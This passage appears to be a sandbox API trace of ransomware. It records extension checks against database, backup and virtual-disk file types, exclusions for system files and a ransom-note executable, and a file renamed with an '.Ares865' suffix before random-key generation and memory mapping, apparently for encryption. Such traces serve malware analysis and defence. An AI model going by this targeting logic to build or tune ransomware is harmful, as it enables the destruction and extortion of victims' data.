[0087.488] lstrlenW (lpString="abx") returned 3 [0087.488] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.488] lstrlenW (lpString="accdb") returned 5 [0087.488] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.488] lstrlenW (lpString="accdc") returned 5 [0087.488] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.488] lstrlenW (lpString="accde") returned 5 [0087.488] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.488] lstrlenW (lpString="accdr") returned 5 [0087.488] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.488] lstrlenW (lpString="accdt") returned 5 [0087.488] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.488] lstrlenW (lpString="accdw") returned 5 [0087.488] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.488] lstrlenW (lpString="accft") returned 5 [0087.488] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.488] lstrlenW (lpString="adb") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.489] lstrlenW (lpString="adb") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.489] lstrlenW (lpString="ade") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.489] lstrlenW (lpString="adf") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.489] lstrlenW (lpString="adn") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.489] lstrlenW (lpString="adp") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.489] lstrlenW (lpString="alf") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.489] lstrlenW (lpString="ask") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.489] lstrlenW (lpString="btr") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.489] lstrlenW (lpString="cat") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.489] lstrlenW (lpString="cdb") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.489] lstrlenW (lpString="ckp") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.489] lstrlenW (lpString="cma") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.489] lstrlenW (lpString="cpd") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.489] lstrlenW (lpString="dacpac") returned 6 [0087.489] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.489] lstrlenW (lpString="dad") returned 3 [0087.489] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.489] lstrlenW (lpString="dadiagrams") returned 10 [0087.489] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0087.489] lstrlenW (lpString="daschema") returned 8 [0087.489] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.489] lstrlenW (lpString="db-journal") returned 10 [0087.489] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0087.489] lstrlenW (lpString="db-shm") returned 6 [0087.490] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.490] lstrlenW (lpString="db-wal") returned 6 [0087.490] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.490] lstrlenW (lpString="dbc") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.490] lstrlenW (lpString="dbs") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.490] lstrlenW (lpString="dbt") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.490] lstrlenW (lpString="dbv") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.490] lstrlenW (lpString="dbx") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.490] lstrlenW (lpString="dcb") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.490] lstrlenW (lpString="dct") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.490] lstrlenW (lpString="dcx") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.490] lstrlenW (lpString="ddl") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.490] lstrlenW (lpString="dlis") returned 4 [0087.490] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.490] lstrlenW (lpString="dp1") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.490] lstrlenW (lpString="dqy") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.490] lstrlenW (lpString="dsk") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.490] lstrlenW (lpString="dsn") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.490] lstrlenW (lpString="dtsx") returned 4 [0087.490] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.490] lstrlenW (lpString="dxl") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.490] lstrlenW (lpString="eco") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.490] lstrlenW (lpString="ecx") returned 3 [0087.490] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.491] lstrlenW (lpString="edb") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.491] lstrlenW (lpString="epim") returned 4 [0087.491] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.491] lstrlenW (lpString="fcd") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.491] lstrlenW (lpString="fdb") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.491] lstrlenW (lpString="fic") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.491] lstrlenW (lpString="flexolibrary") returned 12 [0087.491] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0087.491] lstrlenW (lpString="fm5") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.491] lstrlenW (lpString="fmp") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.491] lstrlenW (lpString="fmp12") returned 5 [0087.491] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.491] lstrlenW (lpString="fmpsl") returned 5 [0087.491] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.491] lstrlenW (lpString="fol") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.491] lstrlenW (lpString="fp3") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.491] lstrlenW (lpString="fp4") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.491] lstrlenW (lpString="fp5") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.491] lstrlenW (lpString="fp7") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.491] lstrlenW (lpString="fpt") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.491] lstrlenW (lpString="frm") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.491] lstrlenW (lpString="gdb") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.491] lstrlenW (lpString="gdb") returned 3 [0087.491] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.492] lstrlenW (lpString="grdb") returned 4 [0087.492] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.492] lstrlenW (lpString="gwi") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.492] lstrlenW (lpString="hdb") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.492] lstrlenW (lpString="his") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.492] lstrlenW (lpString="ib") returned 2 [0087.492] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.492] lstrlenW (lpString="idb") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.492] lstrlenW (lpString="ihx") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.492] lstrlenW (lpString="itdb") returned 4 [0087.492] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.492] lstrlenW (lpString="itw") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.492] lstrlenW (lpString="jet") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.492] lstrlenW (lpString="jtx") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.492] lstrlenW (lpString="kdb") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.492] lstrlenW (lpString="kexi") returned 4 [0087.492] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.492] lstrlenW (lpString="kexic") returned 5 [0087.492] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.492] lstrlenW (lpString="kexis") returned 5 [0087.492] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.492] lstrlenW (lpString="lgc") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.492] lstrlenW (lpString="lwx") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.492] lstrlenW (lpString="maf") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.492] lstrlenW (lpString="maq") returned 3 [0087.492] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.492] lstrlenW (lpString="mar") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.493] lstrlenW (lpString="marshal") returned 7 [0087.493] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.493] lstrlenW (lpString="mas") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.493] lstrlenW (lpString="mav") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.493] lstrlenW (lpString="maw") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.493] lstrlenW (lpString="mdbhtml") returned 7 [0087.493] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.493] lstrlenW (lpString="mdn") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.493] lstrlenW (lpString="mdt") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.493] lstrlenW (lpString="mfd") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.493] lstrlenW (lpString="mpd") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.493] lstrlenW (lpString="mrg") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.493] lstrlenW (lpString="mud") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.493] lstrlenW (lpString="mwb") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.493] lstrlenW (lpString="myd") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.493] lstrlenW (lpString="ndf") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.493] lstrlenW (lpString="nnt") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.493] lstrlenW (lpString="nrmlib") returned 6 [0087.493] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.493] lstrlenW (lpString="ns2") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.493] lstrlenW (lpString="ns3") returned 3 [0087.493] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.493] lstrlenW (lpString="ns4") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.494] lstrlenW (lpString="nsf") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.494] lstrlenW (lpString="nv") returned 2 [0087.494] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.494] lstrlenW (lpString="nv2") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.494] lstrlenW (lpString="nwdb") returned 4 [0087.494] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.494] lstrlenW (lpString="nyf") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.494] lstrlenW (lpString="odb") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.494] lstrlenW (lpString="odb") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.494] lstrlenW (lpString="oqy") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.494] lstrlenW (lpString="ora") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.494] lstrlenW (lpString="orx") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.494] lstrlenW (lpString="owc") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.494] lstrlenW (lpString="p96") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.494] lstrlenW (lpString="p97") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.494] lstrlenW (lpString="pan") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.494] lstrlenW (lpString="pdb") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.494] lstrlenW (lpString="pdm") returned 3 [0087.494] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.494] lstrlenW (lpString="pnz") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.495] lstrlenW (lpString="qry") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.495] lstrlenW (lpString="qvd") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.495] lstrlenW (lpString="rbf") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.495] lstrlenW (lpString="rctd") returned 4 [0087.495] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.495] lstrlenW (lpString="rod") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.495] lstrlenW (lpString="rodx") returned 4 [0087.495] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.495] lstrlenW (lpString="rpd") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.495] lstrlenW (lpString="rsd") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.495] lstrlenW (lpString="sas7bdat") returned 8 [0087.495] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.495] lstrlenW (lpString="sbf") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.495] lstrlenW (lpString="scx") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.495] lstrlenW (lpString="sdb") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.495] lstrlenW (lpString="sdc") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.495] lstrlenW (lpString="sdf") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.495] lstrlenW (lpString="sis") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.495] lstrlenW (lpString="spq") returned 3 [0087.495] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.495] lstrlenW (lpString="te") returned 2 [0087.495] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.495] lstrlenW (lpString="teacher") returned 7 [0087.495] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.495] lstrlenW (lpString="tmd") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.496] lstrlenW (lpString="tps") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.496] lstrlenW (lpString="trc") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.496] lstrlenW (lpString="trc") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.496] lstrlenW (lpString="trm") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.496] lstrlenW (lpString="udb") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.496] lstrlenW (lpString="udl") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.496] lstrlenW (lpString="usr") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.496] lstrlenW (lpString="v12") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.496] lstrlenW (lpString="vis") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.496] lstrlenW (lpString="vpd") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.496] lstrlenW (lpString="vvv") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.496] lstrlenW (lpString="wdb") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.496] lstrlenW (lpString="wmdb") returned 4 [0087.496] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.496] lstrlenW (lpString="wrk") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.496] lstrlenW (lpString="xdb") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.496] lstrlenW (lpString="xld") returned 3 [0087.496] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.496] lstrlenW (lpString="xmlff") returned 5 [0087.496] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.496] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.Ares865") returned 80 [0087.496] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.497] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.498] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=48992) returned 1 [0087.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.498] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.499] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.499] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.499] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc260, lpName=0x0) returned 0x15c [0087.500] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc260) returned 0x190000 [0087.503] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.504] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.504] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0087.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.504] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0087.505] CloseHandle (hObject=0x15c) returned 1 [0087.505] CloseHandle (hObject=0x118) returned 1 [0087.505] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.505] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.505] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.505] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd48e100, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbd48e100, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0x3d960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GRINTL32.REST.trx_dll", cAlternateFileName="GRINTL~2.TRX")) returned 1 [0087.505] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0087.505] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.505] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2=".") returned 1 [0087.505] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="..") returned 1 [0087.505] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="windows") returned -1 [0087.505] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="bootmgr") returned 1 [0087.506] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="temp") returned -1 [0087.506] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="pagefile.sys") returned -1 [0087.506] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="boot") returned 1 [0087.506] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="ids.txt") returned -1 [0087.506] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="ntuser.dat") returned -1 [0087.506] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="perflogs") returned -1 [0087.506] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="MSBuild") returned -1 [0087.506] lstrlenW (lpString="GRINTL32.REST.trx_dll") returned 21 [0087.506] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll") returned 72 [0087.506] lstrcpyW (in: lpString1=0x2cce468, lpString2="GRINTL32.REST.trx_dll" | out: lpString1="GRINTL32.REST.trx_dll") returned="GRINTL32.REST.trx_dll" [0087.506] lstrlenW (lpString="GRINTL32.REST.trx_dll") returned 21 [0087.506] lstrlenW (lpString="Ares865") returned 7 [0087.506] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.506] lstrlenW (lpString=".dll") returned 4 [0087.506] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2=".dll") returned 1 [0087.506] lstrlenW (lpString=".lnk") returned 4 [0087.506] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2=".lnk") returned 1 [0087.506] lstrlenW (lpString=".ini") returned 4 [0087.506] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2=".ini") returned 1 [0087.506] lstrlenW (lpString=".sys") returned 4 [0087.506] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2=".sys") returned 1 [0087.506] lstrlenW (lpString="GRINTL32.REST.trx_dll") returned 21 [0087.506] lstrlenW (lpString="bak") returned 3 [0087.506] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.506] lstrlenW (lpString="ba_") returned 3 [0087.506] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.506] lstrlenW (lpString="dbb") returned 3 [0087.506] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.506] lstrlenW (lpString="vmdk") returned 4 [0087.506] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.506] lstrlenW (lpString="rar") returned 3 [0087.506] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.506] lstrlenW (lpString="zip") returned 3 [0087.506] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.506] lstrlenW (lpString="tgz") returned 3 [0087.506] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.506] lstrlenW (lpString="vbox") returned 4 [0087.506] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.507] lstrlenW (lpString="vdi") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.507] lstrlenW (lpString="vhd") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.507] lstrlenW (lpString="vhdx") returned 4 [0087.507] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.507] lstrlenW (lpString="avhd") returned 4 [0087.507] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.507] lstrlenW (lpString="db") returned 2 [0087.507] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.507] lstrlenW (lpString="db2") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.507] lstrlenW (lpString="db3") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.507] 